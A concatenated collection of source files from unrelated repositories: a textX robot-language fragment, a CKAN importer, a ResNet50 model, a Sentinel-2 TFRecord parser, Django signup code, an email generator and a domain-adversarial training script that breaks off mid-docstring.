@language("Robot", "*.robot")
def robot():
"A language for defining robot behaviour"
def semantic_check(model, metamodel):
if model.name == "WrongMode":
raise TextXSemanticError(
'The root mode cannot be called "Wrong Mode".', **get_location(model)
)
def mode_obj_processor(mode):
if mode.name[0].islower():
raise TextXSemanticError(
f'Mode name "{mode.name}" must be capitalized.', **get_location(mode)
)
metamodel = metamodel_from_file(join(dirname(__file__), "robot.tx"))
metamodel.register_model_processor(semantic_check)
metamodel.register_obj_processors({"Mode": mode_obj_processor})
return metamodel
``` |
{
"source": "jnxnpn/MeTA",
"score": 3
} |
#### File: functionalities/importlib/importer.py
```python
import StringIO
import re
import datetime
class ImportException(Exception):
pass
class RowParseError(ImportException):
pass
class DataRecords(object):
'''Represents raw data records in the form of a dictionary.
(The raw data is not yet processed - it will be converted to package_dict
in the next step.)
'''
@property
def records(self):
'''Yields each record as a dict.'''
raise NotImplementedError
class PackageImporter(object):
'''Base class for an importer that converts a particular file type
and creates corresponding package dictionaries.'''
_log = []
def __init__(self, filepath=None, buf=None):
assert filepath or buf, 'Must specify a filepath or a buf.'
self._filepath = filepath
self._buf = buf
self.import_into_package_records()
def import_into_package_records(self):
'''Reads in the source file given by self._filepath and
stores the resulting DataRecords in self._package_data_records.'''
raise NotImplementedError()
@classmethod
def log(cls, msg):
cls._log.append(msg)
@classmethod
def get_log(cls):
return cls._log
@classmethod
def clear_log(cls):
cls._log = []
def record_2_package(self, record_dict):
'''Converts a raw record into a package dictionary.
@param record_dict - the raw record
@return - pkg_dict'''
raise NotImplementedError()
def pkg_dict(self):
'''Generates package dicts from the package data records.'''
for row_dict in self._package_data_records.records:
try:
yield self.record_2_package(row_dict)
except RowParseError, e:
print 'Error with row', e
raise StopIteration
@classmethod
def license_2_license_id(self, license_title, logger=None):
# import is here, as it creates a dependency on ckan, which
# many importers won't want
from ckan.model.license import LicenseRegister
licenses = LicenseRegister()
license_obj = licenses.get_by_title(license_title)
if license_obj:
return u'%s' % license_obj.id
else:
logger('Warning: No license name matches \'%s\'. Ignoring license.' % license_title)
@classmethod
def munge(self, name):
'''Munge a title into a name.
Note this function must be only carefully changed, as reimporting
data with a name munged differently may create duplicates packages.
For this reason, this munge function is for use by the importers only.
Other users should use the API slug creation functionality.
'''
# import is here, as it creates a dependency on ckan, which
# many importers won't want
import ckan.model as model
# convert spaces to underscores
name = re.sub(' ', '_', name).lower()
# convert symbols to dashes
name = re.sub('[:]', '_-', name).lower()
name = re.sub('[/]', '-', name).lower()
# take out not-allowed characters
name = re.sub('[^a-zA-Z0-9-_]', '', name).lower()
# remove double underscores
name = re.sub('__', '_', name).lower()
# if longer than max_length, keep last word if a year
max_length = model.PACKAGE_NAME_MAX_LENGTH - 5
# (make length less than max, in case we need a few for '_' chars
# to de-clash names.)
if len(name) > max_length:
year_match = re.match('.*?[_-]((?:\d{2,4}[-/])?\d{2,4})$', name)
if year_match:
year = year_match.groups()[0]
name = '%s-%s' % (name[:(max_length-len(year)-1)], year)
else:
name = name[:max_length]
return name
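    # Illustrative example of the rules above (assuming the title is shorter than
    # ckan's configured maximum name length):
    #   munge('Monthly Spend Data: 2009/2010') -> 'monthly_spend_data_-_2009-2010'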
@classmethod
def name_munge(self, input_name):
'''Munges the name field in case it is not to spec.
Note this function must be only carefully changed, as reimporting
data with a name munged differently may create duplicates packages.
For this reason, this munge function is for use by the importers only.
Other users should use the API slug creation functionality.
'''
return self.munge(input_name.replace(' ', '').replace('.', '_').replace('&', 'and'))
@classmethod
def tidy_url(self, url, logger=None):
if url and not url.startswith('http') and not url.startswith('webcal:'):
if url.startswith('www.'):
url = url.replace('www.', 'http://www.')
else:
logger('Warning: URL doesn\'t start with http: %s' % url)
return url
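# Illustrative sketch only (not part of the original module): a minimal concrete
# importer pairing an in-memory DataRecords source with record_2_package. The
# _DictDataRecords helper and the 'title'/'url' record keys are hypothetical.
class _DictDataRecords(DataRecords):
    def __init__(self, dicts):
        self._dicts = dicts
    @property
    def records(self):
        return iter(self._dicts)
class _ExamplePackageImporter(PackageImporter):
    def import_into_package_records(self):
        self._package_data_records = _DictDataRecords(
            [{'title': 'Monthly Spend Data: 2009/2010',
              'url': 'www.example.com/data.csv'}])
    def record_2_package(self, record_dict):
        # munge() imports ckan lazily, so ckan must be installed when this runs
        return {'name': self.munge(record_dict['title']),
                'title': record_dict['title'],
                'url': self.tidy_url(record_dict['url'], logger=self.log)}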
``` |
{
"source": "jnxyp/NetInspectionHelper",
"score": 3
} |
#### File: NetInspectionHelper/src/executor.py
```python
from pprint import pprint
from PIL import Image
from config import MAX_RETRY, SCREENSHOT_FILENAME_PAGE, SCREENSHOT_FILENAME_SCREEN, \
SCREENSHOT_PAGE_TASKBAR_HEIGHT, SCREENSHOT_PAGE_TASKBAR_RESIZE_FACTOR, SCREENSHOT_PAGE_TASKBAR
from document_generator import InspectionReport
from sites import SITES, Site
from util import p
class Executor:
def __init__(self, companies: list, included_sites: list = SITES):
self.sites = included_sites
self.companies = companies
self.failed_sites = {company_name: list() for company_name in self.get_companies()}
self.failed_reports = []
def get_companies(self) -> list:
return self.companies
def get_sites(self) -> list:
return self.sites
def execute(self):
self.grab_all()
self.print_failed_summary()
def grab_all(self):
p("开始从{}个页面抓取{}个公司的信息".format(len(self.get_sites()), len(self.get_companies())))
for company_name in self.get_companies():
self.grab_sites(company_name)
self.generate_report(company_name)
p("\t{} 全部完成".format(company_name))
def grab_sites(self, company_name: str):
p("\t{}".format(company_name))
p("\t\t开始抓取公司信息".format(company_name))
for site in self.get_sites():
attempt = 1
try:
while attempt <= MAX_RETRY:
result = site.grab(company_name)
if result:
if SCREENSHOT_PAGE_TASKBAR:
self.append_taskbar(company_name, site)
break
p("\t\t第{}次尝试失败".format(attempt))
attempt += 1
if attempt > MAX_RETRY:
self.failed_sites[company_name].append(site.get_name())
p("\t放弃抓取页面")
except Exception as e:
self.failed_sites[company_name].append(site.get_name())
p("\t\t\t" + repr(e))
p("\t\t公司信息抓取完毕".format(company_name))
def append_taskbar(self, company_name: str, site: Site):
p("\t\t\t- 为页面截图添加任务栏")
screen_shot_path_page = site.get_screenshot_file_name_full(company_name,
SCREENSHOT_FILENAME_PAGE)
screen_shot_path_screen = site.get_screenshot_file_name_full(company_name,
SCREENSHOT_FILENAME_SCREEN)
page = Image.open(screen_shot_path_page)
screen = Image.open(screen_shot_path_screen)
taskbar_height = int(SCREENSHOT_PAGE_TASKBAR_HEIGHT * SCREENSHOT_PAGE_TASKBAR_RESIZE_FACTOR)
screen_width, screen_height = screen.size
taskbar_image = screen.crop(
(0, screen_height - taskbar_height, screen_width, screen_height))
page_width, page_height = page.size
resize_ratio = page_width / screen_width
taskbar_image = taskbar_image.resize((page_width, int(taskbar_height * resize_ratio)))
new_page = Image.new('RGBA', (page_width, page_height+taskbar_height))
new_page.paste(page)
new_page.paste(taskbar_image, (0, page_height))
new_page.save(screen_shot_path_page)
p("\t\t\t√ 添加完毕")
def generate_report(self, company_name: str):
p("\t\t开始生成报告".format(company_name))
try:
report = InspectionReport(company_name, self.get_sites())
report.generate()
report.save()
p("\t\t√ 报告生成完毕".format(company_name))
except Exception as e:
p("\t\t× 报告生成失败".format(company_name))
p("\t\t\t" + repr(e))
self.failed_reports.append(company_name)
def print_failed_summary(self):
p("=" * 20)
p("以下页面抓取失败:")
pprint(self.failed_sites)
p("以下报告生成失败:")
pprint(self.failed_reports)
```
#### File: NetInspectionHelper/src/util.py
```python
from config import DEBUG
def read_file(path: str) -> list:
with open(path, encoding='utf8') as file:
return file.readlines()
def p(s: str):
if (DEBUG):
print(s)
``` |
{
"source": "jnyborg/irn",
"score": 3
} |
#### File: irn/net/resnet50.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
model_urls = {
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth'
}
class FixedBatchNorm(nn.BatchNorm2d):
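    """BatchNorm2d that always normalises with its stored running statistics
    (training=False), so pretrained batch-norm statistics stay frozen."""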
def forward(self, input):
return F.batch_norm(input, self.running_mean, self.running_var, self.weight, self.bias,
training=False, eps=self.eps)
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = FixedBatchNorm(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=dilation, bias=False, dilation=dilation)
self.bn2 = FixedBatchNorm(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = FixedBatchNorm(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.dilation = dilation
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, strides=(2, 2, 2, 2), dilations=(1, 1, 1, 1)):
self.inplanes = 64
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=strides[0], padding=3,
bias=False)
self.bn1 = FixedBatchNorm(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0], stride=1, dilation=dilations[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=strides[1], dilation=dilations[1])
self.layer3 = self._make_layer(block, 256, layers[2], stride=strides[2], dilation=dilations[2])
self.layer4 = self._make_layer(block, 512, layers[3], stride=strides[3], dilation=dilations[3])
self.inplanes = 1024
#self.avgpool = nn.AvgPool2d(7, stride=1)
#self.fc = nn.Linear(512 * block.expansion, 1000)
def _make_layer(self, block, planes, blocks, stride=1, dilation=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
FixedBatchNorm(planes * block.expansion),
)
layers = [block(self.inplanes, planes, stride, downsample, dilation=1)]
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, dilation=dilation))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
        # avgpool/fc are not defined for this backbone (see __init__ above), so
        # return the layer4 feature map instead of classification logits
        return x
def resnet50(pretrained=True, in_channels=3, **kwargs):
model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
if pretrained:
state_dict = model_zoo.load_url(model_urls['resnet50'])
state_dict.pop('fc.weight')
state_dict.pop('fc.bias')
model.load_state_dict(state_dict)
if in_channels != 3:
patch_first_conv(model, in_channels)
return model
# Thanks to https://github.com/qubvel/segmentation_models.pytorch/blob/master/segmentation_models_pytorch/encoders/_utils.py
def patch_first_conv(model, in_channels):
"""Change first convolution layer input channels.
In case:
in_channels == 1 or in_channels == 2 -> reuse original weights
in_channels > 3 -> make random kaiming normal initialization
"""
# get first conv
for module in model.modules():
if isinstance(module, nn.Conv2d):
break
# change input channels for first conv
module.in_channels = in_channels
weight = module.weight.detach()
reset = False
if in_channels == 1:
weight = weight.sum(1, keepdim=True)
elif in_channels == 2:
weight = weight[:, :2] * (3.0 / 2.0)
else:
reset = True
weight = torch.Tensor(
module.out_channels,
module.in_channels // module.groups,
*module.kernel_size
)
module.weight = nn.parameter.Parameter(weight)
if reset:
module.reset_parameters()
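if __name__ == "__main__":
    # Usage sketch (illustrative, not part of the original file): patch a randomly
    # initialised backbone so its first convolution accepts a single channel.
    m = ResNet(Bottleneck, [3, 4, 6, 3])
    patch_first_conv(m, in_channels=1)
    print(m.conv1.weight.shape)  # torch.Size([64, 1, 7, 7])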
``` |
{
"source": "jnyborg/MTLCC",
"score": 3
} |
#### File: jnyborg/MTLCC/S2parser.py
```python
import tensorflow as tf
import numpy as np
import sys
import os
class S2parser():
""" defined the Sentinel 2 .tfrecord format """
def __init__(self):
self.feature_format = {
'x10/data': tf.FixedLenFeature([], tf.string),
'x10/shape': tf.FixedLenFeature([4], tf.int64),
'x20/data': tf.FixedLenFeature([], tf.string),
'x20/shape': tf.FixedLenFeature([4], tf.int64),
'x60/data': tf.FixedLenFeature([], tf.string),
'x60/shape': tf.FixedLenFeature([4], tf.int64),
'dates/doy': tf.FixedLenFeature([], tf.string),
'dates/year': tf.FixedLenFeature([], tf.string),
'dates/shape': tf.FixedLenFeature([1], tf.int64),
'labels/data': tf.FixedLenFeature([], tf.string),
'labels/shape': tf.FixedLenFeature([2], tf.int64)
}
return None
def write(self, filename, x10, x20, x60, doy, year, labels):
# https://stackoverflow.com/questions/39524323/tf-sequenceexample-with-multidimensional-arrays
writer = tf.python_io.TFRecordWriter(filename)
# Changed from 64bit to smaller sizes
x10 = x10.astype(np.uint16)
x20 = x20.astype(np.uint16)
x60 = x60.astype(np.uint16)
doy = doy.astype(np.uint16)
year = year.astype(np.uint16)
labels = labels.astype(np.uint8)
# Create a write feature
feature = {
'x10/data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[x10.tobytes()])),
'x10/shape': tf.train.Feature(int64_list=tf.train.Int64List(value=x10.shape)),
'x20/data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[x20.tobytes()])),
'x20/shape': tf.train.Feature(int64_list=tf.train.Int64List(value=x20.shape)),
'x60/data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[x60.tobytes()])),
'x60/shape': tf.train.Feature(int64_list=tf.train.Int64List(value=x60.shape)),
'labels/data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[labels.tobytes()])),
'labels/shape': tf.train.Feature(int64_list=tf.train.Int64List(value=labels.shape)),
'dates/doy': tf.train.Feature(bytes_list=tf.train.BytesList(value=[doy.tobytes()])),
'dates/year': tf.train.Feature(bytes_list=tf.train.BytesList(value=[year.tobytes()])),
'dates/shape': tf.train.Feature(int64_list=tf.train.Int64List(value=doy.shape))
}
example = tf.train.Example(features=tf.train.Features(feature=feature))
writer.write(example.SerializeToString())
writer.close()
sys.stdout.flush()
def parse_example(self, serialized_example):
"""
example proto can be obtained via
filename_queue = tf.train.string_input_producer(filenames, num_epochs=None)
or by passing this function in dataset.map(.)
"""
feature = tf.parse_single_example(serialized_example, self.feature_format)
# decode and reshape x10
x10 = tf.reshape(tf.decode_raw(feature['x10/data'], tf.uint16), tf.cast(feature['x10/shape'], tf.int32))
x20 = tf.reshape(tf.decode_raw(feature['x20/data'], tf.uint16), tf.cast(feature['x20/shape'], tf.int32))
x60 = tf.reshape(tf.decode_raw(feature['x60/data'], tf.uint16), tf.cast(feature['x60/shape'], tf.int32))
doy = tf.reshape(tf.decode_raw(feature['dates/doy'], tf.uint16), tf.cast(feature['dates/shape'], tf.int32))
year = tf.reshape(tf.decode_raw(feature['dates/year'], tf.uint16), tf.cast(feature['dates/shape'], tf.int32))
labels = tf.reshape(tf.decode_raw(feature['labels/data'], tf.uint8), tf.cast(feature['labels/shape'], tf.int32))
return x10, x20, x60, doy, year, labels
def test():
print "Running self test:"
print "temporary tfrecord file is written with random numbers"
print "tfrecord file is read back"
print "contents are compared"
filename = "tmptile.tfrecord"
# create dummy dataset
x10 = (np.random.rand(5, 24, 24, 4) * 1e3).astype(np.uint16)
x20 = (np.random.rand(5, 12, 12, 4) * 1e3).astype(np.uint16)
x60 = (np.random.rand(5, 4, 4, 3) * 1e3).astype(np.uint16)
labels = (np.random.rand(24, 24)).astype(np.uint8)
doy = (np.random.rand(5) * 1e3).astype(np.uint16)
year = (np.random.rand(5) * 1e3).astype(np.uint16)
# init parser
parser = S2parser()
parser.write(filename, x10, x20, x60, doy, year, labels)
tf_record_file_queue = tf.train.string_input_producer([filename])
reader = tf.TFRecordReader()
_, s = reader.read(tf_record_file_queue)
x10_, x20_, x60_, doy_, year_, labels_ = parser.parse_example(s)
with tf.Session() as sess:
tf.global_variables_initializer()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
x10_, x20_, x60_, doy_, year_, labels_ = sess.run([x10_, x20_, x60_, doy_, year_, labels_ ])
if np.all(x10_ == x10) and np.all(x20_ == x20) and np.all(x60_ == x60) and np.all(labels_ == labels) and np.all(
doy_ == doy) and np.all(year_ == year):
print "PASSED"
else:
print "NOT PASSED"
os.remove(filename)
if __name__ == '__main__':
test()
``` |
{
"source": "jnyborg/nospammail",
"score": 2
} |
#### File: backend/login/forms.py
```python
from django.forms import EmailField
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class UserCreationForm(UserCreationForm):
email = EmailField(label=_("Email address"), required=True)
class Meta:
model = User
fields = ("username", "email", "<PASSWORD>", "<PASSWORD>")
def clean(self):
cleaned_data = super(UserCreationForm, self).clean()
if cleaned_data.get("email"):
email = cleaned_data["email"]
if "@nospammail.org" in email:
raise ValidationError("You cannot register using a nospammail address.")
elif User.objects.filter(email=email).exists():
                raise ValidationError("A user with that email address already exists.")
return cleaned_data
def save(self, commit=True):
user = super(UserCreationForm, self).save(commit=False)
if commit:
user.save()
return user
```
#### File: backend/login/views.py
```python
from django.contrib.auth import login, authenticate
from django.shortcuts import render, redirect
from login.forms import UserCreationForm
from django.http import HttpResponse
from nospammail.urls import anonymous_required
from http import HTTPStatus
@anonymous_required(custom_redirect=HttpResponse("You are already signed in, please sign out and try again.", status=HTTPStatus.UNAUTHORIZED))
def signup(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
            raw_password = form.cleaned_data.get('password1')
            user = authenticate(username=username, password=raw_password)
login(request, user)
return redirect('/')
else:
form = UserCreationForm()
return render(request, 'registration/signup.html', {'form': form})
```
#### File: backend/settings_console/generateemail.py
```python
import string
import random
import psycopg2
import os
def __generatePrefix():
allowedCharacters = string.ascii_lowercase + "".join(map(str, range(10)))
tempEmail = ""
for num in range(10):
tempEmail += allowedCharacters[random.randint(0, len(allowedCharacters) - 1)]
return tempEmail + "@nospammail.org"
def __emailIsUnique(email):
try:
conn = psycopg2.connect("dbname='nospammail' " \
"user='nospammail' " \
"host='{}'" \
"password='{}'".format(
os.environ.get('NOSPAMMAIL_HOST', False),
os.environ.get('NOSPAMMAIL_PW', False)))
cur = conn.cursor()
cur.execute("select * from settings_console_generatedemail as g where g.email='{}';".format(email))
rows = cur.fetchall()
return len(rows) <= 0
except Exception as e:
print("Unable to connect to DB: %s: %s" % e.errno, e.strerror)
return False
def generateRandomEmail():
newEmail = __generatePrefix()
while not __emailIsUnique(newEmail):
#print("Email {} was not uinque!".format(newEmail))
newEmail = __generatePrefix()
return newEmail
if __name__ == "__main__":
print(generateRandomEmail())
``` |
{
"source": "jnyborg/timematch",
"score": 2
} |
#### File: competitors/dann/dann.py
```python
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import LambdaLR
from torch.optim.sgd import SGD
from torchvision import transforms
from tqdm import tqdm
from dataset import PixelSetData
from evaluation import validation
from transforms import Normalize, RandomSamplePixels, RandomSampleTimeSteps, ToTensor, RandomTemporalShift, Identity
from utils.metrics import accuracy
from utils.train_utils import AverageMeter, cycle, to_cuda, cat_samples
from typing import List, Dict, Optional
import torch.nn.functional as F
from competitors.dann.grl import WarmStartGradientReverseLayer
import numpy as np
def train_dann(
model, config, writer, val_loader, device, best_model_path, fold_num, splits
):
source_loader, target_loader = get_data_loaders(splits, config)
if config.weights is not None:
pretrained_path = f"{config.weights}/fold_{fold_num}"
pretrained_weights = torch.load(f"{pretrained_path}/model.pt")["state_dict"]
model.load_state_dict(pretrained_weights)
features_dim = 128
hidden_size = 1024
if config.adv_loss == "DANN":
domain_discri = DomainDiscriminator(features_dim, hidden_size=hidden_size).to(
device
)
domain_adv = DomainAdversarialLoss(domain_discri).to(device)
elif config.adv_loss in ["CDAN", "CDAN+E"]:
use_entropy = config.adv_loss == "CDAN+E"
use_randomized = features_dim * config.num_classes > 4096
randomized_dim = 1024
if use_randomized:
domain_discri = DomainDiscriminator(
randomized_dim, hidden_size=hidden_size
).to(device)
else:
domain_discri = DomainDiscriminator(
features_dim * config.num_classes, hidden_size=hidden_size
).to(device)
domain_adv = ConditionalDomainAdversarialLoss(
domain_discri,
entropy_conditioning=use_entropy,
num_classes=config.num_classes,
features_dim=features_dim,
randomized=use_randomized,
randomized_dim=randomized_dim,
).to(device)
else:
raise NotImplementedError
if config.use_default_optim:
base_lr = 1.0
classifier_params = [
{"params": model.spatial_encoder.parameters(), "lr": 0.1 * base_lr},
{"params": model.temporal_encoder.parameters(), "lr": 0.1 * base_lr},
{"params": model.decoder.parameters(), "lr": 1.0 * base_lr},
]
lr_gamma = 0.001
lr_decay = 0.75
optimizer = SGD(
classifier_params + domain_discri.get_parameters(),
config.lr,
momentum=0.9,
weight_decay=config.weight_decay,
nesterov=True,
)
lr_scheduler = LambdaLR(
optimizer, lambda x: config.lr * (1.0 + lr_gamma * float(x)) ** (-lr_decay)
)
else:
optimizer = torch.optim.Adam(
list(model.parameters()) + list(domain_discri.parameters()),
lr=config.lr,
weight_decay=config.weight_decay,
)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(
optimizer, T_max=config.epochs * config.steps_per_epoch, eta_min=0
)
## train
best_f1 = 0.0
criterion = nn.CrossEntropyLoss()
global_step = 0
source_iter = iter(cycle(source_loader))
target_iter = iter(cycle(target_loader))
for epoch in range(config.epochs):
progress_bar = tqdm(
range(config.steps_per_epoch),
desc=f"{config.adv_loss} Epoch {epoch + 1}/{config.epochs}",
)
losses = AverageMeter()
class_accs = AverageMeter()
domain_accs = AverageMeter()
model.train()
domain_adv.train()
for _ in progress_bar:
x_s, x_t = next(source_iter), next(target_iter)
labels_s = x_s["label"].cuda()
x = cat_samples([x_s, x_t])
y, f = model(*to_cuda(x, device), return_feats=True)
y_s, y_t = y.chunk(2, dim=0)
f_s, f_t = f.chunk(2, dim=0)
cls_loss = criterion(y_s, labels_s)
if config.adv_loss == "DANN":
transfer_loss = domain_adv(f_s, f_t)
else:
transfer_loss = domain_adv(y_s, f_s, y_t, f_t)
domain_acc = domain_adv.domain_discriminator_accuracy
loss = cls_loss + transfer_loss * config.trade_off
optimizer.zero_grad()
loss.backward()
optimizer.step()
lr_scheduler.step()
losses.update(loss.item(), config.batch_size)
class_accs.update(accuracy(y_s, labels_s), config.batch_size)
domain_accs.update(domain_acc, config.batch_size)
progress_bar.set_postfix(
loss=f"{losses.avg:.3f}",
class_acc=f"{class_accs.avg:.2f}",
domain_acc=f"{domain_accs.avg:.2f}",
)
if global_step % config.log_step == 0:
writer.add_scalar("train/loss", losses.val, global_step)
writer.add_scalar("train/accuracy", class_accs.val, global_step)
writer.add_scalar(
"train/lr", optimizer.param_groups[0]["lr"], global_step
)
global_step += 1
progress_bar.close()
model.eval()
best_f1 = validation(
best_f1, None, config, criterion, device, epoch, model, val_loader, writer
)
# save final model and use for evaluation
torch.save({"state_dict": model.state_dict()}, best_model_path)
def get_data_loaders(splits, config):
def create_data_loader(dataset):
return torch.utils.data.DataLoader(
dataset,
num_workers=config.num_workers,
pin_memory=True,
batch_size=config.batch_size,
shuffle=True,
drop_last=True,
)
train_transform = transforms.Compose(
[
RandomSamplePixels(config.num_pixels),
RandomSampleTimeSteps(config.seq_length),
RandomTemporalShift(max_shift=config.max_shift_aug, p=config.shift_aug_p) if config.with_shift_aug else Identity(),
Normalize(),
ToTensor(),
]
)
source_dataset = PixelSetData(
config.data_root,
config.source,
config.classes,
train_transform,
indices=splits[config.source]["train"],
)
source_loader = create_data_loader(source_dataset)
target_dataset = PixelSetData(
config.data_root,
config.target,
config.classes,
train_transform,
indices=splits[config.target]["train"],
)
target_loader = create_data_loader(target_dataset)
print(
f"size of source dataset: {len(source_dataset)} ({len(source_loader)} batches)"
)
print(
f"size of target dataset: {len(target_dataset)} ({len(target_loader)} batches)"
)
return source_loader, target_loader
class DomainDiscriminator(nn.Sequential):
r"""Domain discriminator model from
`"Domain-Adversarial Training of Neural Networks" (ICML 2015) <https://arxiv.org/abs/1505.07818>`_
Distinguish whether the input features come from the source domain or the target domain.
The source domain label is 1 and the target domain label is 0.
Args:
in_feature (int): dimension of the input feature
hidden_size (int): dimension of the hidden features
batch_norm (bool): whether use :class:`~torch.nn.BatchNorm1d`.
Use :class:`~torch.nn.Dropout` if ``batch_norm`` is False. Default: True.
Shape:
- Inputs: (minibatch, `in_feature`)
- Outputs: :math:`(minibatch, 1)`
"""
def __init__(self, in_feature: int, hidden_size: int, batch_norm=True):
if batch_norm:
super(DomainDiscriminator, self).__init__(
nn.Linear(in_feature, hidden_size),
nn.BatchNorm1d(hidden_size),
nn.ReLU(),
nn.Linear(hidden_size, hidden_size),
nn.BatchNorm1d(hidden_size),
nn.ReLU(),
nn.Linear(hidden_size, 1),
nn.Sigmoid(),
)
else:
super(DomainDiscriminator, self).__init__(
nn.Linear(in_feature, hidden_size),
nn.ReLU(inplace=True),
nn.Dropout(0.5),
nn.Linear(hidden_size, hidden_size),
nn.ReLU(inplace=True),
nn.Dropout(0.5),
nn.Linear(hidden_size, 1),
nn.Sigmoid(),
)
def get_parameters(self) -> List[Dict]:
return [{"params": self.parameters(), "lr": 1.0}]
class DomainAdversarialLoss(nn.Module):
"""
The Domain Adversarial Loss proposed in
`Domain-Adversarial Training of Neural Networks (ICML 2015) <https://arxiv.org/abs/1505.07818>`_
Domain adversarial loss measures the domain discrepancy through training a domain discriminator.
Given domain discriminator :math:`D`, feature representation :math:`f`, the definition of DANN loss is
.. math::
loss(\mathcal{D}_s, \mathcal{D}_t) = \mathbb{E}_{x_i^s \sim \mathcal{D}_s} log[D(f_i^s)]
+ \mathbb{E}_{x_j^t \sim \mathcal{D}_t} log[1-D(f_j^t)].
Args:
domain_discriminator (torch.nn.Module): A domain discriminator object, which predicts the domains of features. Its input shape is (N, F) and output shape is (N, 1)
reduction (str, optional): Specifies the reduction to apply to the output:
``'none'`` | ``'mean'`` | ``'sum'``. ``'none'``: no reduction will be applied,
``'mean'``: the sum of the output will be divided by the number of
elements in the output, ``'sum'``: the output will be summed. Default: ``'mean'``
grl (WarmStartGradientReverseLayer, optional): Default: None.
Inputs:
- f_s (tensor): feature representations on source domain, :math:`f^s`
- f_t (tensor): feature representations on target domain, :math:`f^t`
- w_s (tensor, optional): a rescaling weight given to each instance from source domain.
- w_t (tensor, optional): a rescaling weight given to each instance from target domain.
Shape:
- f_s, f_t: :math:`(N, F)` where F means the dimension of input features.
- Outputs: scalar by default. If :attr:`reduction` is ``'none'``, then :math:`(N, )`.
Examples::
>>> from dalib.modules.domain_discriminator import DomainDiscriminator
>>> discriminator = DomainDiscriminator(in_feature=1024, hidden_size=1024)
>>> loss = DomainAdversarialLoss(discriminator, reduction='mean')
>>> # features from source domain and target domain
>>> f_s, f_t = torch.randn(20, 1024), torch.randn(20, 1024)
>>> # If you want to assign different weights to each instance, you should pass in w_s and w_t
>>> w_s, w_t = torch.randn(20), torch.randn(20)
>>> output = loss(f_s, f_t, w_s, w_t)
"""
def __init__(
self,
domain_discriminator: nn.Module,
reduction: Optional[str] = "mean",
grl: Optional = None,
):
super(DomainAdversarialLoss, self).__init__()
self.grl = (
WarmStartGradientReverseLayer(
alpha=1.0, lo=0.0, hi=1.0, max_iters=1000, auto_step=True
)
if grl is None
else grl
)
self.domain_discriminator = domain_discriminator
self.bce = lambda input, target, weight: F.binary_cross_entropy(
input, target, weight=weight, reduction=reduction
)
self.domain_discriminator_accuracy = None
def forward(
self,
f_s: torch.Tensor,
f_t: torch.Tensor,
w_s: Optional[torch.Tensor] = None,
w_t: Optional[torch.Tensor] = None,
) -> torch.Tensor:
f = self.grl(torch.cat((f_s, f_t), dim=0))
d = self.domain_discriminator(f)
d_s, d_t = d.chunk(2, dim=0)
d_label_s = torch.ones((f_s.size(0), 1)).to(f_s.device)
d_label_t = torch.zeros((f_t.size(0), 1)).to(f_t.device)
self.domain_discriminator_accuracy = 0.5 * (
binary_accuracy(d_s, d_label_s) + binary_accuracy(d_t, d_label_t)
)
if w_s is None:
w_s = torch.ones_like(d_label_s)
if w_t is None:
w_t = torch.ones_like(d_label_t)
return 0.5 * (
self.bce(d_s, d_label_s, w_s.view_as(d_s))
+ self.bce(d_t, d_label_t, w_t.view_as(d_t))
)
def binary_accuracy(output: torch.Tensor, target: torch.Tensor) -> float:
"""Computes the accuracy for binary classification"""
with torch.no_grad():
batch_size = target.size(0)
pred = (output >= 0.5).float().t().view(-1)
correct = pred.eq(target.view(-1)).float().sum()
correct.mul_(100.0 / batch_size)
return correct
class ConditionalDomainAdversarialLoss(nn.Module):
r"""The Conditional Domain Adversarial Loss used in `Conditional Adversarial Domain Adaptation (NIPS 2018) <https://arxiv.org/abs/1705.10667>`_
Conditional Domain adversarial loss measures the domain discrepancy through training a domain discriminator in a
conditional manner. Given domain discriminator :math:`D`, feature representation :math:`f` and
classifier predictions :math:`g`, the definition of CDAN loss is
.. math::
loss(\mathcal{D}_s, \mathcal{D}_t) &= \mathbb{E}_{x_i^s \sim \mathcal{D}_s} log[D(T(f_i^s, g_i^s))] \\
&+ \mathbb{E}_{x_j^t \sim \mathcal{D}_t} log[1-D(T(f_j^t, g_j^t))],\\
where :math:`T` is a :class:`MultiLinearMap` or :class:`RandomizedMultiLinearMap` which convert two tensors to a single tensor.
Args:
domain_discriminator (torch.nn.Module): A domain discriminator object, which predicts the domains of
